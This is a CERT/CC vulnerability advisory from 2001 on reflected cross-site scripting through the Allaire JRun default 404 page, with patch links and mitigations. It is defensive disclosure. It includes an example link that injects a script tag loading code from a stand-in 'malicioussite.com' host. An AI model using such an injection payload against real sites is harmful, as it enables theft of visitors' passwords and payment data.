search menu icon-carat-right cmu-wordmark

CERT Coordination Center

Allaire JRun Java Application Server vulnerable to Cross-Site Scripting via passing of user input directly to default error page

Vulnerability Note VU#654643

Original Release Date: 2001-07-27 | Last Revised: 2001-07-30

Overview

Web Servers that use the Allaire JRun Java Servlet Container are vulnerable to a cross-site scripting vulnerability. A web site may inadvertently include malicious HTML tags or script(JavaScript, VBScript, Java, etc.) in a dynamically generated page based on unvalidated input from untrustworthy sources. This can be a problem when a web server does not adequately ensure that generated pages are properly encoded to prevent unintended execution of scripts, and when input is not validated to prevent malicious HTML from being presented to the user.

Description

It is possible to use a "cross-site" scripting technique to inject malicious script (JavaScript, VBScript, etc.) or HTML into a web page.

The essence of cross-site scripting is that an intruder causes a legitimate web server to send a page to a victim's web browser that contains malicious script or HTML of the intruder's choosing. The malicious script runs with the privileges of a legitimate script originating from the legitimate web server.

Several server applications are vulnerable to such an technique via various default error pages.

For example, A valid URL request might be

http://www.example.com/FILENAME.html

However, if the requested document "FILENAME.html" did not exist, the web site could return an error message such as:

<HTML>
404 page does not exist: FILENAME.html
....
</HTML>

Notice that "FILENAME.html" is a string that was inputed by a user and is included in the page returned by the web site straight through to the client's browser.

If a malicious web site existed that offered a link to example.com that looked something like this

<A HREF="http://www.example.com/<script%20SRC='http://www.malicioussite.com/evilscript.js'></script>">Click Here</a>

The "FILENAME.html" submitted to example.com is

<script SRC='http://www.malicioussite.com/evilscript.js'></script>

example.com then uses its ordinary routines to generate an error page to you that
reads:

<HTML>
404 page not found: <script SRC='http://www.malicioussite.com/evilscript.js'></script>
....
</HTML>

In effect, malicioussite.com has managed to "inject" a JavaScript program of their choosing into the page returned to the user by example.com. The JavaScript runs as if it originated at example.com, and can therefore process events in that document, but it can also communicate with malicioussite.com by virtue of having come from there. Thus, this vulnerability could be used to "sniff" sensitive data from within the web page, including passwords, credit card numbers, and any arbitrary information the user inputs. There are a variety of variants to this problem.

The ultimate fix to this problem involves recoding a very large number of web sites so that they properly filter and validate the input they receive and properly encode or filter the output before returning it to the user or acting upon it. This process is a very large undertaking.

Impact

The victim will be presented with information which the compromised site did not wish their visitors to be subjected. This could be used to "sniff" sensitive data from within the web page, including passwords, credit card numbers, and any arbitrary information the user inputs.

Solution

Install the proper JRun patch:


Windows 95/98/NT/2000 and Windows NT Alpha:
JRun 3.0: http://download1.allaire.com/publicdl/en/jrun/30/jr30sp2_MPSB_03_04_05_06.exe
JRun 2.3.3: http://download1.allaire.com/publicdl/en/jrun/23/jp23159w_MPSB_03_04_05_06.exe

UNIX/Linux patch - GNU gzip/tar:
JRun 3.0: http://download1.allaire.com/publicdl/en/jrun/30/jr30sp2u_MPSB_03_04_05_06.sh
JRun 2.3.3: http://download1.allaire.com/publicdl/en/jrun/23/jp23159w_MPSB_03_04_05_06.tar.gz

Please Note: The patch for MSPB01-03, MSPB01-04, MSPB01-05, and MSPB01-06 is identical. If you have already installed the patch for one, you do not need to install it for any of the others. It is recommended that you back up your existing data before applying any patch.

A web master may change the default error page to not include the file name passed in by any user. The client may disable JavaScript (or VBScript or other scripting languages), but it doesn't address the problem of simply inserting malicious HTML, and it can cause undesired functionality.

Vendor Information

654643
 

Allaire Corporation Affected

Notified:  March 13, 2001 Updated: July 27, 2001

Status

Affected

Vendor Statement

http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.


CVSS Metrics

Group Score Vector
Base
Temporal
Environmental

References

Acknowledgements

Our thanks to Hiromitsu Takagi, who discovered this instance of the cross-site scripting vulnerability.

This document was originally written by Shawn Hernan in July 2000. It has been adapted for this instance by Jason Rafail.

Other Information

CVE IDs: None
Severity Metric: 59.06
Date Public: 2001-07-02
Date First Published: 2001-07-27
Date Last Updated: 2001-07-30 18:58 UTC
Document Revision: 14

Sponsored by CISA.